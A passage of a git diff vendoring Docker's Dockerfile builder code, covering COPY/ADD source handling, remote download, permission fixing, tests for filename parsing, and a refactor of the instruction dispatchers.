[]string{} + if o.activeLayer != nil { + o.activeLayer.Release() + o.activeLayer = nil + } +} + +// TODO: allowWildcards can probably be removed by refactoring this function further. +func (o *copier) calcCopyInfo(origPath string, allowWildcards bool) ([]copyInfo, error) { + imageSource := o.imageSource + + // TODO: do this when creating copier. Requires validateCopySourcePath + // (and other below) to be aware of the difference sources. Why is it only + // done on image Source? + if imageSource != nil && o.activeLayer == nil { + // this needs to be protected against repeated calls as wildcard copy + // will call it multiple times for a single COPY + var err error + rwLayer, err := imageSource.NewRWLayer() + if err != nil { + return nil, err + } + o.activeLayer = rwLayer + + o.source, err = remotecontext.NewLazySource(rwLayer.Root()) + if err != nil { + return nil, errors.Wrapf(err, "failed to create context for copy from %s", rwLayer.Root().Path()) + } + } + + if o.source == nil { + return nil, errors.Errorf("missing build context") + } + + root := o.source.Root() + + if err := validateCopySourcePath(imageSource, origPath, root.OS()); err != nil { + return nil, err + } + + // Work in source OS specific filepath semantics + // For LCOW, this is NOT the daemon OS. + origPath = root.FromSlash(origPath) + origPath = strings.TrimPrefix(origPath, string(root.Separator())) + origPath = strings.TrimPrefix(origPath, "."+string(root.Separator())) + + // Deal with wildcards + if allowWildcards && containsWildcards(origPath, root.OS()) { + return o.copyWithWildcards(origPath) + } + + if imageSource != nil && imageSource.ImageID() != "" { + // return a cached copy if one exists + if h, ok := o.pathCache.Load(imageSource.ImageID() + origPath); ok { + return newCopyInfos(newCopyInfoFromSource(o.source, origPath, h.(string))), nil + } + } + + // Deal with the single file case + copyInfo, err := copyInfoForFile(o.source, origPath) + switch { + case err != nil: + return nil, err + case copyInfo.hash != "": + o.storeInPathCache(imageSource, origPath, copyInfo.hash) + return newCopyInfos(copyInfo), err + } + + // TODO: remove, handle dirs in Hash() + subfiles, err := walkSource(o.source, origPath) + if err != nil { + return nil, err + } + + hash := hashStringSlice("dir", subfiles) + o.storeInPathCache(imageSource, origPath, hash) + return newCopyInfos(newCopyInfoFromSource(o.source, origPath, hash)), nil +} + +func containsWildcards(name, platform string) bool { + isWindows := platform == "windows" + for i := 0; i < len(name); i++ { + ch := name[i] + if ch == '\\' && !isWindows { + i++ + } else if ch == '*' || ch == '?' || ch == '[' { + return true + } + } + return false +} + +func (o *copier) storeInPathCache(im *imageMount, path string, hash string) { + if im != nil { + o.pathCache.Store(im.ImageID()+path, hash) + } +} + +func (o *copier) copyWithWildcards(origPath string) ([]copyInfo, error) { + root := o.source.Root() + var copyInfos []copyInfo + if err := root.Walk(root.Path(), func(path string, info os.FileInfo, err error) error { + if err != nil { + return err + } + rel, err := remotecontext.Rel(root, path) + if err != nil { + return err + } + + if rel == "." { + return nil + } + if match, _ := root.Match(origPath, rel); !match { + return nil + } + + // Note we set allowWildcards to false in case the name has + // a * in it + subInfos, err := o.calcCopyInfo(rel, false) + if err != nil { + return err + } + copyInfos = append(copyInfos, subInfos...) + return nil + }); err != nil { + return nil, err + } + return copyInfos, nil +} + +func copyInfoForFile(source builder.Source, path string) (copyInfo, error) { + fi, err := remotecontext.StatAt(source, path) + if err != nil { + return copyInfo{}, err + } + + if fi.IsDir() { + return copyInfo{}, nil + } + hash, err := source.Hash(path) + if err != nil { + return copyInfo{}, err + } + return newCopyInfoFromSource(source, path, "file:"+hash), nil +} + +// TODO: dedupe with copyWithWildcards() +func walkSource(source builder.Source, origPath string) ([]string, error) { + fp, err := remotecontext.FullPath(source, origPath) + if err != nil { + return nil, err + } + // Must be a dir + var subfiles []string + err = source.Root().Walk(fp, func(path string, info os.FileInfo, err error) error { + if err != nil { + return err + } + rel, err := remotecontext.Rel(source.Root(), path) + if err != nil { + return err + } + if rel == "." { + return nil + } + hash, err := source.Hash(rel) + if err != nil { + return nil + } + // we already checked handleHash above + subfiles = append(subfiles, hash) + return nil + }) + if err != nil { + return nil, err + } + + sort.Strings(subfiles) + return subfiles, nil +} + +type sourceDownloader func(string) (builder.Source, string, error) + +func newRemoteSourceDownloader(output, stdout io.Writer) sourceDownloader { + return func(url string) (builder.Source, string, error) { + return downloadSource(output, stdout, url) + } +} + +func errOnSourceDownload(_ string) (builder.Source, string, error) { + return nil, "", errors.New("source can't be a URL for COPY") +} + +func getFilenameForDownload(path string, resp *http.Response) string { + // Guess filename based on source + if path != "" && !strings.HasSuffix(path, "/") { + if filename := filepath.Base(filepath.FromSlash(path)); filename != "" { + return filename + } + } + + // Guess filename based on Content-Disposition + if contentDisposition := resp.Header.Get("Content-Disposition"); contentDisposition != "" { + if _, params, err := mime.ParseMediaType(contentDisposition); err == nil { + if params["filename"] != "" && !strings.HasSuffix(params["filename"], "/") { + if filename := filepath.Base(filepath.FromSlash(params["filename"])); filename != "" { + return filename + } + } + } + } + return "" +} + +func downloadSource(output io.Writer, stdout io.Writer, srcURL string) (remote builder.Source, p string, err error) { + u, err := url.Parse(srcURL) + if err != nil { + return + } + + resp, err := remotecontext.GetWithStatusError(srcURL) + if err != nil { + return + } + + filename := getFilenameForDownload(u.Path, resp) + + // Prepare file in a tmp dir + tmpDir, err := ioutils.TempDir("", "docker-remote") + if err != nil { + return + } + defer func() { + if err != nil { + os.RemoveAll(tmpDir) + } + }() + // If filename is empty, the returned filename will be "" but + // the tmp filename will be created as "__unnamed__" + tmpFileName := filename + if filename == "" { + tmpFileName = unnamedFilename + } + tmpFileName = filepath.Join(tmpDir, tmpFileName) + tmpFile, err := os.OpenFile(tmpFileName, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600) + if err != nil { + return + } + + progressOutput := streamformatter.NewJSONProgressOutput(output, true) + progressReader := progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Downloading") + // Download and dump result to tmp file + // TODO: add filehash directly + if _, err = io.Copy(tmpFile, progressReader); err != nil { + tmpFile.Close() + return + } + // TODO: how important is this random blank line to the output? + fmt.Fprintln(stdout) + + // Set the mtime to the Last-Modified header value if present + // Otherwise just remove atime and mtime + mTime := time.Time{} + + lastMod := resp.Header.Get("Last-Modified") + if lastMod != "" { + // If we can't parse it then just let it default to 'zero' + // otherwise use the parsed time value + if parsedMTime, err := http.ParseTime(lastMod); err == nil { + mTime = parsedMTime + } + } + + tmpFile.Close() + + if err = system.Chtimes(tmpFileName, mTime, mTime); err != nil { + return + } + + lc, err := remotecontext.NewLazySource(containerfs.NewLocalContainerFS(tmpDir)) + return lc, filename, err +} + +type copyFileOptions struct { + decompress bool + chownPair idtools.IDPair + archiver Archiver +} + +type copyEndpoint struct { + driver containerfs.Driver + path string +} + +func performCopyForInfo(dest copyInfo, source copyInfo, options copyFileOptions) error { + srcPath, err := source.fullPath() + if err != nil { + return err + } + + destPath, err := dest.fullPath() + if err != nil { + return err + } + + archiver := options.archiver + + srcEndpoint := ©Endpoint{driver: source.root, path: srcPath} + destEndpoint := ©Endpoint{driver: dest.root, path: destPath} + + src, err := source.root.Stat(srcPath) + if err != nil { + return errors.Wrapf(err, "source path not found") + } + if src.IsDir() { + return copyDirectory(archiver, srcEndpoint, destEndpoint, options.chownPair) + } + if options.decompress && isArchivePath(source.root, srcPath) && !source.noDecompress { + return archiver.UntarPath(srcPath, destPath) + } + + destExistsAsDir, err := isExistingDirectory(destEndpoint) + if err != nil { + return err + } + // dest.path must be used because destPath has already been cleaned of any + // trailing slash + if endsInSlash(dest.root, dest.path) || destExistsAsDir { + // source.path must be used to get the correct filename when the source + // is a symlink + destPath = dest.root.Join(destPath, source.root.Base(source.path)) + destEndpoint = ©Endpoint{driver: dest.root, path: destPath} + } + return copyFile(archiver, srcEndpoint, destEndpoint, options.chownPair) +} + +func isArchivePath(driver containerfs.ContainerFS, path string) bool { + file, err := driver.Open(path) + if err != nil { + return false + } + defer file.Close() + rdr, err := archive.DecompressStream(file) + if err != nil { + return false + } + r := tar.NewReader(rdr) + _, err = r.Next() + return err == nil +} + +func copyDirectory(archiver Archiver, source, dest *copyEndpoint, chownPair idtools.IDPair) error { + destExists, err := isExistingDirectory(dest) + if err != nil { + return errors.Wrapf(err, "failed to query destination path") + } + + if err := archiver.CopyWithTar(source.path, dest.path); err != nil { + return errors.Wrapf(err, "failed to copy directory") + } + // TODO: @gupta-ak. Investigate how LCOW permission mappings will work. + return fixPermissions(source.path, dest.path, chownPair, !destExists) +} + +func copyFile(archiver Archiver, source, dest *copyEndpoint, chownPair idtools.IDPair) error { + if runtime.GOOS == "windows" && dest.driver.OS() == "linux" { + // LCOW + if err := dest.driver.MkdirAll(dest.driver.Dir(dest.path), 0755); err != nil { + return errors.Wrapf(err, "failed to create new directory") + } + } else { + if err := idtools.MkdirAllAndChownNew(filepath.Dir(dest.path), 0755, chownPair); err != nil { + // Normal containers + return errors.Wrapf(err, "failed to create new directory") + } + } + + if err := archiver.CopyFileWithTar(source.path, dest.path); err != nil { + return errors.Wrapf(err, "failed to copy file") + } + // TODO: @gupta-ak. Investigate how LCOW permission mappings will work. + return fixPermissions(source.path, dest.path, chownPair, false) +} + +func endsInSlash(driver containerfs.Driver, path string) bool { + return strings.HasSuffix(path, string(driver.Separator())) +} + +// isExistingDirectory returns true if the path exists and is a directory +func isExistingDirectory(point *copyEndpoint) (bool, error) { + destStat, err := point.driver.Stat(point.path) + switch { + case os.IsNotExist(err): + return false, nil + case err != nil: + return false, err + } + return destStat.IsDir(), nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy_test.go b/vendor/github.com/docker/docker/builder/dockerfile/copy_test.go new file mode 100644 index 0000000000..f559ff4fd8 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/copy_test.go @@ -0,0 +1,148 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "net/http" + "testing" + + "github.com/docker/docker/pkg/containerfs" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" +) + +func TestIsExistingDirectory(t *testing.T) { + tmpfile := fs.NewFile(t, "file-exists-test", fs.WithContent("something")) + defer tmpfile.Remove() + tmpdir := fs.NewDir(t, "dir-exists-test") + defer tmpdir.Remove() + + var testcases = []struct { + doc string + path string + expected bool + }{ + { + doc: "directory exists", + path: tmpdir.Path(), + expected: true, + }, + { + doc: "path doesn't exist", + path: "/bogus/path/does/not/exist", + expected: false, + }, + { + doc: "file exists", + path: tmpfile.Path(), + expected: false, + }, + } + + for _, testcase := range testcases { + result, err := isExistingDirectory(©Endpoint{driver: containerfs.NewLocalDriver(), path: testcase.path}) + if !assert.Check(t, err) { + continue + } + assert.Check(t, is.Equal(testcase.expected, result), testcase.doc) + } +} + +func TestGetFilenameForDownload(t *testing.T) { + var testcases = []struct { + path string + disposition string + expected string + }{ + { + path: "http://www.example.com/", + expected: "", + }, + { + path: "http://www.example.com/xyz", + expected: "xyz", + }, + { + path: "http://www.example.com/xyz.html", + expected: "xyz.html", + }, + { + path: "http://www.example.com/xyz/", + expected: "", + }, + { + path: "http://www.example.com/xyz/uvw", + expected: "uvw", + }, + { + path: "http://www.example.com/xyz/uvw.html", + expected: "uvw.html", + }, + { + path: "http://www.example.com/xyz/uvw/", + expected: "", + }, + { + path: "/", + expected: "", + }, + { + path: "/xyz", + expected: "xyz", + }, + { + path: "/xyz.html", + expected: "xyz.html", + }, + { + path: "/xyz/", + expected: "", + }, + { + path: "/xyz/", + disposition: "attachment; filename=xyz.html", + expected: "xyz.html", + }, + { + disposition: "", + expected: "", + }, + { + disposition: "attachment; filename=xyz", + expected: "xyz", + }, + { + disposition: "attachment; filename=xyz.html", + expected: "xyz.html", + }, + { + disposition: "attachment; filename=\"xyz\"", + expected: "xyz", + }, + { + disposition: "attachment; filename=\"xyz.html\"", + expected: "xyz.html", + }, + { + disposition: "attachment; filename=\"/xyz.html\"", + expected: "xyz.html", + }, + { + disposition: "attachment; filename=\"/xyz/uvw\"", + expected: "uvw", + }, + { + disposition: "attachment; filename=\"Naïve file.txt\"", + expected: "Naïve file.txt", + }, + } + for _, testcase := range testcases { + resp := http.Response{ + Header: make(map[string][]string), + } + if testcase.disposition != "" { + resp.Header.Add("Content-Disposition", testcase.disposition) + } + filename := getFilenameForDownload(testcase.path, &resp) + assert.Check(t, is.Equal(testcase.expected, filename)) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go new file mode 100644 index 0000000000..15453452e5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go @@ -0,0 +1,48 @@ +// +build !windows + +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" +) + +func fixPermissions(source, destination string, rootIDs idtools.IDPair, overrideSkip bool) error { + var ( + skipChownRoot bool + err error + ) + if !overrideSkip { + destEndpoint := ©Endpoint{driver: containerfs.NewLocalDriver(), path: destination} + skipChownRoot, err = isExistingDirectory(destEndpoint) + if err != nil { + return err + } + } + + // We Walk on the source rather than on the destination because we don't + // want to change permissions on things we haven't created or modified. + return filepath.Walk(source, func(fullpath string, info os.FileInfo, err error) error { + // Do not alter the walk root iff. it existed before, as it doesn't fall under + // the domain of "things we should chown". + if skipChownRoot && source == fullpath { + return nil + } + + // Path is prefixed by source: substitute with destination instead. + cleaned, err := filepath.Rel(source, fullpath) + if err != nil { + return err + } + + fullpath = filepath.Join(destination, cleaned) + return os.Lchown(fullpath, rootIDs.UID, rootIDs.GID) + }) +} + +func validateCopySourcePath(imageSource *imageMount, origPath, platform string) error { + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go new file mode 100644 index 0000000000..907c34407c --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go @@ -0,0 +1,43 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "errors" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/idtools" +) + +var pathBlacklist = map[string]bool{ + "c:\\": true, + "c:\\windows": true, +} + +func fixPermissions(source, destination string, rootIDs idtools.IDPair, overrideSkip bool) error { + // chown is not supported on Windows + return nil +} + +func validateCopySourcePath(imageSource *imageMount, origPath, platform string) error { + // validate windows paths from other images + LCOW + if imageSource == nil || platform != "windows" { + return nil + } + + origPath = filepath.FromSlash(origPath) + p := strings.ToLower(filepath.Clean(origPath)) + if !filepath.IsAbs(p) { + if filepath.VolumeName(p) != "" { + if p[len(p)-2:] == ":." { // case where clean returns weird c:. paths + p = p[:len(p)-1] + } + p += "\\" + } else { + p = filepath.Join("c:\\", p) + } + } + if _, blacklisted := pathBlacklist[p]; blacklisted { + return errors.New("copy from c:\\ or c:\\windows is not allowed on windows") + } + return nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go index 3e78abdd68..4d47c208b7 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go @@ -1,4 +1,4 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" // This file contains the dispatchers for each command. Note that // `nullDispatch` is not actually a command, but support for commands we parse @@ -8,23 +8,26 @@ package dockerfile // package. import ( + "bytes" "fmt" - "regexp" "runtime" "sort" - "strconv" "strings" - "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/strslice" "github.com/docker/docker/builder" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/jsonmessage" "github.com/docker/docker/pkg/signal" - runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/docker/pkg/system" "github.com/docker/go-connections/nat" + "github.com/moby/buildkit/frontend/dockerfile/instructions" + "github.com/moby/buildkit/frontend/dockerfile/parser" + "github.com/moby/buildkit/frontend/dockerfile/shell" + "github.com/pkg/errors" ) // ENV foo bar @@ -32,127 +35,54 @@ import ( // Sets the environment variable foo to bar, also makes interpolation // in the dockerfile available from the next statement on via ${foo}. // -func env(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) == 0 { - return errAtLeastOneArgument("ENV") - } - - if len(args)%2 != 0 { - // should never get here, but just in case - return errTooManyArguments("ENV") - } - - if err := b.flags.Parse(); err != nil { - return err - } - - // TODO/FIXME/NOT USED - // Just here to show how to use the builder flags stuff within the - // context of a builder command. Will remove once we actually add - // a builder command to something! - /* - flBool1 := b.flags.AddBool("bool1", false) - flStr1 := b.flags.AddString("str1", "HI") - - if err := b.flags.Parse(); err != nil { - return err - } - - fmt.Printf("Bool1:%v\n", flBool1) - fmt.Printf("Str1:%v\n", flStr1) - */ - - commitStr := "ENV" - - for j := 0; j < len(args); j++ { - // name ==> args[j] - // value ==> args[j+1] - - if len(args[j]) == 0 { - return errBlankCommandNames("ENV") - } - newVar := args[j] + "=" + args[j+1] + "" - commitStr += " " + newVar +func dispatchEnv(d dispatchRequest, c *instructions.EnvCommand) error { + runConfig := d.state.runConfig + commitMessage := bytes.NewBufferString("ENV") + for _, e := range c.Env { + name := e.Key + newVar := e.String() + commitMessage.WriteString(" " + newVar) gotOne := false - for i, envVar := range b.runConfig.Env { + for i, envVar := range runConfig.Env { envParts := strings.SplitN(envVar, "=", 2) compareFrom := envParts[0] - compareTo := args[j] - if runtime.GOOS == "windows" { - // Case insensitive environment variables on Windows - compareFrom = strings.ToUpper(compareFrom) - compareTo = strings.ToUpper(compareTo) - } - if compareFrom == compareTo { - b.runConfig.Env[i] = newVar + if shell.EqualEnvKeys(compareFrom, name) { + runConfig.Env[i] = newVar gotOne = true break } } if !gotOne { - b.runConfig.Env = append(b.runConfig.Env, newVar) + runConfig.Env = append(runConfig.Env, newVar) } - j++ } - - return b.commit("", b.runConfig.Cmd, commitStr) + return d.builder.commit(d.state, commitMessage.String()) } // MAINTAINER some text // // Sets the maintainer metadata. -func maintainer(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("MAINTAINER") - } +func dispatchMaintainer(d dispatchRequest, c *instructions.MaintainerCommand) error { - if err := b.flags.Parse(); err != nil { - return err - } - - b.maintainer = args[0] - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("MAINTAINER %s", b.maintainer)) + d.state.maintainer = c.Maintainer + return d.builder.commit(d.state, "MAINTAINER "+c.Maintainer) } // LABEL some json data describing the image // // Sets the Label variable foo to bar, // -func label(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) == 0 { - return errAtLeastOneArgument("LABEL") - } - if len(args)%2 != 0 { - // should never get here, but just in case - return errTooManyArguments("LABEL") +func dispatchLabel(d dispatchRequest, c *instructions.LabelCommand) error { + if d.state.runConfig.Labels == nil { + d.state.runConfig.Labels = make(map[string]string) } - - if err := b.flags.Parse(); err != nil { - return err - } - commitStr := "LABEL" - - if b.runConfig.Labels == nil { - b.runConfig.Labels = map[string]string{} + for _, v := range c.Labels { + d.state.runConfig.Labels[v.Key] = v.Value + commitStr += " " + v.String() } - - for j := 0; j < len(args); j++ { - // name ==> args[j] - // value ==> args[j+1] - - if len(args[j]) == 0 { - return errBlankCommandNames("LABEL") - } - - newVar := args[j] + "=" + args[j+1] + "" - commitStr += " " + newVar - - b.runConfig.Labels[args[j]] = args[j+1] - j++ - } - return b.commit("", b.runConfig.Cmd, commitStr) + return d.builder.commit(d.state, commitStr) } // ADD foo /path @@ -160,128 +90,204 @@ func label(b *Builder, args []string, attributes map[string]bool, original strin // Add the file 'foo' to '/path'. Tarball and Remote URL (git, http) handling // exist here. If you do not wish to have this automatic handling, use COPY. // -func add(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) < 2 { - return errAtLeastTwoArguments("ADD") - } +func dispatchAdd(d dispatchRequest, c *instructions.AddCommand) error { + downloader := newRemoteSourceDownloader(d.builder.Output, d.builder.Stdout) + copier := copierFromDispatchRequest(d, downloader, nil) + defer copier.Cleanup() - if err := b.flags.Parse(); err != nil { + copyInstruction, err := copier.createCopyInstruction(c.SourcesAndDest, "ADD") + if err != nil { return err } + copyInstruction.chownStr = c.Chown + copyInstruction.allowLocalDecompression = true - return b.runContextCommand(args, true, true, "ADD") + return d.builder.performCopy(d.state, copyInstruction) } // COPY foo /path // // Same as 'ADD' but without the tar and remote url handling. // -func dispatchCopy(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) < 2 { - return errAtLeastTwoArguments("COPY") +func dispatchCopy(d dispatchRequest, c *instructions.CopyCommand) error { + var im *imageMount + var err error + if c.From != "" { + im, err = d.getImageMount(c.From) + if err != nil { + return errors.Wrapf(err, "invalid from flag value %s", c.From) + } } - - if err := b.flags.Parse(); err != nil { + copier := copierFromDispatchRequest(d, errOnSourceDownload, im) + defer copier.Cleanup() + copyInstruction, err := copier.createCopyInstruction(c.SourcesAndDest, "COPY") + if err != nil { return err } + copyInstruction.chownStr = c.Chown - return b.runContextCommand(args, false, false, "COPY") + return d.builder.performCopy(d.state, copyInstruction) } -// FROM imagename -// -// This sets the image the dockerfile will build on top of. -// -func from(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("FROM") +func (d *dispatchRequest) getImageMount(imageRefOrID string) (*imageMount, error) { + if imageRefOrID == "" { + // TODO: this could return the source in the default case as well? + return nil, nil } - if err := b.flags.Parse(); err != nil { - return err + var localOnly bool + stage, err := d.stages.get(imageRefOrID) + if err != nil { + return nil, err } + if stage != nil { + imageRefOrID = stage.Image + localOnly = true + } + return d.builder.imageSources.Get(imageRefOrID, localOnly, d.state.operatingSystem) +} - name := args[0] - - var ( - image builder.Image - err error - ) +// FROM [--platform=platform] imagename[:tag | @digest] [AS build-stage-name] +// +func initializeStage(d dispatchRequest, cmd *instructions.Stage) error { + d.builder.imageProber.Reset() + if err := system.ValidatePlatform(&cmd.Platform); err != nil { + return err + } + image, err := d.getFromImage(d.shlex, cmd.BaseName, cmd.Platform.OS) + if err != nil { + return err + } + state := d.state + if err := state.beginStage(cmd.Name, image); err != nil { + return err + } + if len(state.runConfig.OnBuild) > 0 { + triggers := state.runConfig.OnBuild + state.runConfig.OnBuild = nil + return dispatchTriggeredOnBuild(d, triggers) + } + return nil +} - // Windows cannot support a container with no base image. - if name == api.NoBaseImageSpecifier { - if runtime.GOOS == "windows" { - return fmt.Errorf("Windows does not support FROM scratch") +func dispatchTriggeredOnBuild(d dispatchRequest, triggers []string) error { + fmt.Fprintf(d.builder.Stdout, "# Executing %d build trigger", len(triggers)) + if len(triggers) > 1 { + fmt.Fprint(d.builder.Stdout, "s") + } + fmt.Fprintln(d.builder.Stdout) + for _, trigger := range triggers { + d.state.updateRunConfig() + ast, err := parser.Parse(strings.NewReader(trigger)) + if err != nil { + return err } - b.image = "" - b.noBaseImage = true - } else { - // TODO: don't use `name`, instead resolve it to a digest - if !b.options.PullParent { - image, err = b.docker.GetImageOnBuild(name) - // TODO: shouldn't we error out if error is different from "not found" ? + if len(ast.AST.Children) != 1 { + return errors.New("onbuild trigger should be a single expression") } - if image == nil { - image, err = b.docker.PullOnBuild(b.clientCtx, name, b.options.AuthConfigs, b.Output) - if err != nil { - return err + cmd, err := instructions.ParseCommand(ast.AST.Children[0]) + if err != nil { + if instructions.IsUnknownInstruction(err) { + buildsFailed.WithValues(metricsUnknownInstructionError).Inc() } + return err } + err = dispatch(d, cmd) + if err != nil { + return err + } + } + return nil +} + +func (d *dispatchRequest) getExpandedImageName(shlex *shell.Lex, name string) (string, error) { + substitutionArgs := []string{} + for key, value := range d.state.buildArgs.GetAllMeta() { + substitutionArgs = append(substitutionArgs, key+"="+value) } - b.from = image - return b.processImageFrom(image) + name, err := shlex.ProcessWord(name, substitutionArgs) + if err != nil { + return "", err + } + return name, nil } -// ONBUILD RUN echo yo -// -// ONBUILD triggers run when the image is used in a FROM statement. -// -// ONBUILD handling has a lot of special-case functionality, the heading in -// evaluator.go and comments around dispatch() in the same file explain the -// special cases. search for 'OnBuild' in internals.go for additional special -// cases. -// -func onbuild(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) == 0 { - return errAtLeastOneArgument("ONBUILD") +// getOsFromFlagsAndStage calculates the operating system if we need to pull an image. +// stagePlatform contains the value supplied by optional `--platform=` on +// a current FROM statement. b.builder.options.Platform contains the operating +// system part of the optional flag passed in the API call (or CLI flag +// through `docker build --platform=...`). Precedence is for an explicit +// platform indication in the FROM statement. +func (d *dispatchRequest) getOsFromFlagsAndStage(stageOS string) string { + switch { + case stageOS != "": + return stageOS + case d.builder.options.Platform != "": + // Note this is API "platform", but by this point, as the daemon is not + // multi-arch aware yet, it is guaranteed to only hold the OS part here. + return d.builder.options.Platform + default: + return runtime.GOOS } +} - if err := b.flags.Parse(); err != nil { - return err +func (d *dispatchRequest) getImageOrStage(name string, stageOS string) (builder.Image, error) { + var localOnly bool + if im, ok := d.stages.getByName(name); ok { + name = im.Image + localOnly = true } - triggerInstruction := strings.ToUpper(strings.TrimSpace(args[0])) - switch triggerInstruction { - case "ONBUILD": - return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed") - case "MAINTAINER", "FROM": - return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", triggerInstruction) + os := d.getOsFromFlagsAndStage(stageOS) + + // Windows cannot support a container with no base image unless it is LCOW. + if name == api.NoBaseImageSpecifier { + imageImage := &image.Image{} + imageImage.OS = runtime.GOOS + if runtime.GOOS == "windows" { + switch os { + case "windows", "": + return nil, errors.New("Windows does not support FROM scratch") + case "linux": + if !system.LCOWSupported() { + return nil, errors.New("Linux containers are not supported on this system") + } + imageImage.OS = "linux" + default: + return nil, errors.Errorf("operating system %q is not supported", os) + } + } + return builder.Image(imageImage), nil } + imageMount, err := d.builder.imageSources.Get(name, localOnly, os) + if err != nil { + return nil, err + } + return imageMount.Image(), nil +} +func (d *dispatchRequest) getFromImage(shlex *shell.Lex, name string, stageOS string) (builder.Image, error) { + name, err := d.getExpandedImageName(shlex, name) + if err != nil { + return nil, err + } + return d.getImageOrStage(name, stageOS) +} - original = regexp.MustCompile(`(?i)^\s*ONBUILD\s*`).ReplaceAllString(original, "") +func dispatchOnbuild(d dispatchRequest, c *instructions.OnbuildCommand) error { - b.runConfig.OnBuild = append(b.runConfig.OnBuild, original) - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ONBUILD %s", original)) + d.state.runConfig.OnBuild = append(d.state.runConfig.OnBuild, c.Expression) + return d.builder.commit(d.state, "ONBUILD "+c.Expression) } // WORKDIR /tmp // // Set the working directory for future RUN/CMD/etc statements. // -func workdir(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("WORKDIR") - } - - err := b.flags.Parse() - if err != nil { - return err - } - - // This is from the Dockerfile and will not necessarily be in platform - // specific semantics, hence ensure it is converted. - b.runConfig.WorkingDir, err = normaliseWorkdir(b.runConfig.WorkingDir, args[0]) +func dispatchWorkdir(d dispatchRequest, c *instructions.WorkdirCommand) error { + runConfig := d.state.runConfig + var err error + runConfig.WorkingDir, err = normalizeWorkdir(d.state.operatingSystem, runConfig.WorkingDir, c.Path) if err != nil { return err } @@ -290,35 +296,33 @@ func workdir(b *Builder, args []string, attributes map[string]bool, original str // This avoids having an unnecessary expensive mount/unmount calls // (on Windows in particular) during each container create. // Prior to 1.13, the mkdir was deferred and not executed at this step. - if b.disableCommit { + if d.builder.disableCommit { // Don't call back into the daemon if we're going through docker commit --change "WORKDIR /foo". // We've already updated the runConfig and that's enough. return nil } - b.runConfig.Image = b.image - cmd := b.runConfig.Cmd - comment := "WORKDIR " + b.runConfig.WorkingDir - // reset the command for cache detection - b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) "+comment)) - defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) + comment := "WORKDIR " + runConfig.WorkingDir + runConfigWithCommentCmd := copyRunConfig(runConfig, withCmdCommentString(comment, d.state.operatingSystem)) - if hit, err := b.probeCache(); err != nil { + containerID, err := d.builder.probeAndCreate(d.state, runConfigWithCommentCmd) + if err != nil || containerID == "" { return err - } else if hit { - return nil } - container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig}) - if err != nil { - return err - } - b.tmpContainers[container.ID] = struct{}{} - if err := b.docker.ContainerCreateWorkdir(container.ID); err != nil { + if err := d.builder.docker.ContainerCreateWorkdir(containerID); err != nil { return err } - return b.commit(container.ID, cmd, comment) + return d.builder.commitContainer(d.state, containerID, runConfigWithCommentCmd) +} + +func resolveCmdLine(cmd instructions.ShellDependantCmdLine, runConfig *container.Config, os string) []string { + result := cmd.CmdLine + if cmd.PrependShell && result != nil { + result = append(getShell(runConfig, os), result...) + } + return result } // RUN some command yo @@ -327,117 +331,86 @@ func workdir(b *Builder, args []string, attributes map[string]bool, original str // the current SHELL which defaults to 'sh -c' under linux or 'cmd /S /C' under // Windows, in the event there is only one argument The difference in processing: // -// RUN echo hi # sh -c echo hi (Linux) +// RUN echo hi # sh -c echo hi (Linux and LCOW) // RUN echo hi # cmd /S /C echo hi (Windows) // RUN [ "echo", "hi" ] # echo hi // -func run(b *Builder, args []string, attributes map[string]bool, original string) error { - if b.image == "" && !b.noBaseImage { - return fmt.Errorf("Please provide a source image with `from` prior to run") - } - - if err := b.flags.Parse(); err != nil { - return err +func dispatchRun(d dispatchRequest, c *instructions.RunCommand) error { + if !system.IsOSSupported(d.state.operatingSystem) { + return system.ErrNotSupportedOperatingSystem } + stateRunConfig := d.state.runConfig + cmdFromArgs := resolveCmdLine(c.ShellDependantCmdLine, stateRunConfig, d.state.operatingSystem) + buildArgs := 